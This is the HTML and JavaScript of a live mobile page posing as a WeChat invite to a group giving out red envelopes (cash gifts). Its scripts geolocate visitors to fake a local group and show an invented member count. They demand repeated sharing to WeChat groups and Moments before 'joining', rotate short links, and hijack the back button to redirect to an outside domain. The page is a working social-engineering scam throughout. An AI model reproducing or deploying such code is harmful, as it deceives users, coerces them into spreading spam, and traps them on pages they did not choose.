<html lang="zh-cn"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no">
	<meta name="format-detection" content="telephone=no">
	<title></title>
	<script src="assets/jquery.js"></script>	
	<script type="text/javascript" src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
	<script src="assets/jm.js"></script>
	<script>
	window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", window.location.href.split('#')[0]+"#"+new Date().getTime());}
    function jp() {location.href="http://wx.484838.com.cn/wx/app/index.html";}
    setTimeout('hh();', 200);	
	</script>
	<style type="text/css">
		.fenxiang_zdy{
			display:block;
			position:fixed;
			z-index:1015;
			background:rgba(0,0,0,.8);
			width:100%;
			height:100%;
			
			top:0px;
			left:0px;
		}
		.fenxiang_zdy img{
			width:100%;
			height:40%;
			display:block;
			position:fixed;
			top:30px;
			
		}	
		h1,h2,div,body,img,a{margin: 0;padding: 0;}
		body{font-size:16px;line-height:1.5;font-family: "微软雅黑","Lucida Grande",STHeiti,Verdana,Arial,Times,serif;background:#f0eff4;}
		img{ border:0 none; }
		a{text-decoration:none;font-weight:normal;color:#333333;}
		ul{list-style: unset;list-style-type:decimal;}

		.top{width:100%;background:#ffffff;margin:0 auto;text-align: center;padding:30px 0 24px;}
		.top img{width:90px;border-radius:5px;}
		.top h2{font-weight: normal;font-size:18px;margin-top:7px;}
		.top span{color:#878787;}

		.bot{width:100%;border-top: 1px solid #bebebe;}
		.bot h1{width:100%;text-align: center;display: inline;float: left;font-weight: normal;color:#4d4c51;font-size:20px;margin:40px 0 10px;}
		.bot a{width:54%;display: inline;float: left;margin:15px 23% 25px;background:#04be01;color:#ffffff;text-align: center;padding:8px 0;border-radius:5px;font-size:18px;}
		.bot ul{color:#b5b4b9;display: inline;float: left;margin-left:10px;margin-right:30px;}
	</style>
</head>
<body>
	<div class="top">
		<img src="assets/qun_meilv.jpg">
		<script>
		function getString(name){var reg=new RegExp("(^|&)"+name+"=([^&]*)(&|$)","i");var r=window.location.search.substr(1).match(reg);if(r!=null)return unescape(r[2]);return""}
		var timeNum = Date.parse(new Date());
				 timeNum = timeNum.toString();
				 timeNum = timeNum.substr(0,10);
		var stime = Number(getString("s"));
		if ( stime != "" && timeNum - stime > 7) { 
			//location.href = "/back.html";
		}
		if (typeof remote_ip_info != "undefined") {
			var myDate = new Date();
			var hours  = myDate.getHours()+1;
			document.write("<h2>"+remote_ip_info["city"]+"红包群"+hours+"点准时发红包"+"</h2>");
		}else{
			document.write("<h2>抢红包啦</h2>");
		}
		function random(min,max){
			return Math.floor(min+Math.random()*(max-min));
		}

		</script><h2></h2>
		<span><script>document.write(random(100,500));</script>人</span>
	</div>
	<div class="bot">
			<script>
			document.write("<a class='bon' href='#'>加入群聊</a>");
			</script>
	</div>
	<div class="fenxiang_zdy" style="display:block;">
		<img src="assets/share.png">
		<div class="clear"></div>
	</div>
	<div style="display:none;">
		
	</div>

<link rel="stylesheet" type="text/css" href="assets/weui.css">
<div class="weui_dialog_alert" id="doWithdrawDialog" style="display:none; position: fixed;z-index: 20000;">
    <div class="weui_mask"></div>
    <div class="weui_dialog">
        <div class="weui_dialog_hd"><strong class="weui_dialog_title" style="font-size: 18px;">温馨提示</strong></div>
        <div class="weui_dialog_bd" id="weui_dialog_bd" style="font-size: 14px;"></div>
        <div class="weui_dialog_ft">
            <a href="javascript:;" class="weui_btn_dialog primary" style="font-size: 18px;padding:10px;font-weight:bold;">确定</a>
        </div>
    </div>
</div>
<script type="text/javascript">
	document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {WeixinJSBridge.call('showOptionMenu');});
	var curWwwPath=window.document.location.href;
	var pathName=window.document.location.pathname;
	var pos=curWwwPath.indexOf(pathName);
	var localhostPaht=curWwwPath.substring(0,pos);
	var projectName=pathName.substring(0,pathName.substr(1).indexOf('/')+1);
	var baseUrl = localhostPaht+projectName;
	var link = ['http://t.cn/RiEm24n','http://t.cn/RiEmUaZ','http://t.cn/RiEmbQA'];
	var randnum = Math.round(Math.random()*(link.length-1)+0);
	link = link[randnum];
	var friend_num = 0;
	var sharedata = {
		'title':'邀请你加入群聊',//微信群配置
		'link':link,
		'imgUrl':baseUrl+'/assets/qun_meilv.jpg',
		'desc':'我邀请你加入群聊午夜小秘密~，进入可查看详情。',
		'qtitle':'没想到吧，我要请你加入这个群~快来吧！红包等着你',//朋友圈配置
		'qlink':link,
		'qimgUrl':baseUrl+'/assets/qun_meilv.jpg',
		'qdesc':'我邀请你加入群聊午夜小秘密~，进入可查看详情。',
		'success':function(res){
			if(res == "friend"){
				friend_num++;
				if (friend_num >= 3) {
					alertUI('分享到【微信群】成功，加入群聊只差最后一步分享到朋友圈!');
				}else{
					alertUI('分享到【微信群】成功，加入群聊还需' + (3- friend_num) + '次分享!');
				}
			}else if(res == "timeline"){
				if(friend_num >= 3){
					//location.href = baseUrl + "/app/index.html";

					location.href = 'http://wx.484838.com.cn/wx/app/index.html';
//location.href = 'http://wx.055563.com.cn/ad/';
				}else{
					alertUI('请先分享到微信群!');
				}
			}
		}
	};
</script>
	<div style="display:none;">
		<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1261011996'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1261011996' type='text/javascript'%3E%3C/script%3E"));</script>
	</div>
<script type="text/javascript" src="assets/jquery.load.js"></script>
</body>
</html>
